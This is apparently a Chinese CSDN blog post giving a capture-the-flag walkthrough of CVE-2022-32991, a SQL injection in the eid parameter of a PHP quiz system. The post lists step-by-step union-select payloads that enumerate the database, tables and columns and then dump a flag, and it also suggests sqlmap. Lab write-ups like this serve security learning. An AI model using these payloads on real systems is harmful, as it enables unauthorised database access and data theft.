春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入

最新推荐文章于 2023-10-27 20:08:00 发布
最新推荐文章于 2023-10-27 20:08:00 发布
阅读量597 收藏 6
点赞数 4
分类专栏: 渗透测试 解题WP 文章标签: sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ambition_sec/article/details/127892470
版权

最近新开了一个靶场,今天也去打卡签到

CVE-2022-32991编号

进入页面之后访问/register.php先进行注册

点击start之后注入点

 此处可以可以直接进行sqlmap一把梭step=2&eid=60377db362694

关于源码下载地址

可以查看源码看到没有进行任何过滤的方式

首先使用order by 判断出存在5个字符

之后就是常规的操作

'and 1=2 union select 1,2,3,4,5--+

 页面返回3字段中存在信息

'and 1=2 union select 1,2,database(),4,5--+

 默认数据库为ctf

'and 1=2 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema='ctf'--+

可以看到存在一个flag的表,进行查看flag表中的字段 

'and 1=2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema='ctf' and table_name='flag'--+

很好!直接拖flag! 

' and 1=2 union select 1,2,group_concat(flag),4,5 from flag--+

flag{2a1c735d-7a13-4d4e-8508-93874b510a49}

成功拿到flag

 

最后附上靶场地址

春秋云境 

知名小朋友
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
春秋云境:CVE-2022-32991SQL注入
m0_65712192的博客
04-12 1586
该CMS的welcome.php中存在SQL注入攻击。
CVE-2022-32991
龙狼刺的博客
05-30 471
该CMS的welcome.php中存在SQL注入攻击。Web Based Quiz System是一个应用软件。用于一个简单的在线基础的项目。Web Based Quiz System v1.0版本存在SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令窃取数据库敏感数据。
春秋云境】CVE-2022-32991
ZXW_NUDT的博客
02-22 2505
春秋云境】CVE-2022-32991
CVE-2022-32991靶场复现
m0_73734159的博客
10-27 675
由于没有注入窗口,所以想到了,火狐+burpsuite+sqlmap组合拷打。复制带有eid参数的页面网址,用火狐浏览器打开,进行burpsuite抓包。箭头所指方向存在welcome.php文件但是参数不是eid,而是p。题目提示了该CMS的welcome.php中存在SQL注入攻击。welcome.php页面存在SQL注入,并且这个参数是eid。下方有Start开始按钮,点点试试,看看有没有新的发现。创建一个txt文件,将数据包复制到这个txt文件里面。注入前的准备工作,了解sqlmap的部分参数。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
Apache Spark 命令注入(CVE-2022-33891)格式化文档
08-10
Apache Spark 命令注入(CVE-2022-33891)格式化文档 Apache Spark 命令注入(CVE-2022-33891)漏洞复现 CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark ...
春秋云境】CVE-2022-32991靶场WP
果粒程
11-25 434
春秋云境】CVE-2022-32991靶场WP
春秋云镜靶场CVE-2022-32991,个人学习总结。
Wow1world的博客
06-07 148
春秋云境靶场:CVE-2022-32991的解题思路~
春秋云镜 CVE-2022-32991 Web Based Quiz System v1.0 [超详细新手教程]
starttv的博客
10-26 734
Web Based Quiz System v1.0 通过welcome.php 中的eid 参数被发现包含一个SQL 注入漏洞。
春秋云镜(二)
wanan的博客
02-19 392
春秋云镜(二)
春秋云镜CVE-2022-28512(SQL注入
m0_65712192的博客
04-20 397
该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
春秋云境—Initial
龙狼刺的博客
07-15 1780
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。在DCSync技术没有出现之前,攻击者要想拿到域内用户的hash,就只能在域控制器上运行 Mimikatz 或 Invoke-Mimikatz去抓取密码hash,但是在2015 年 8 月份, Mimkatz新增了一个主要功能叫"DCSync",使用这项技术可以有效地 “模拟” 域控制器并从目标域控上请求域内用户密码hash。
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值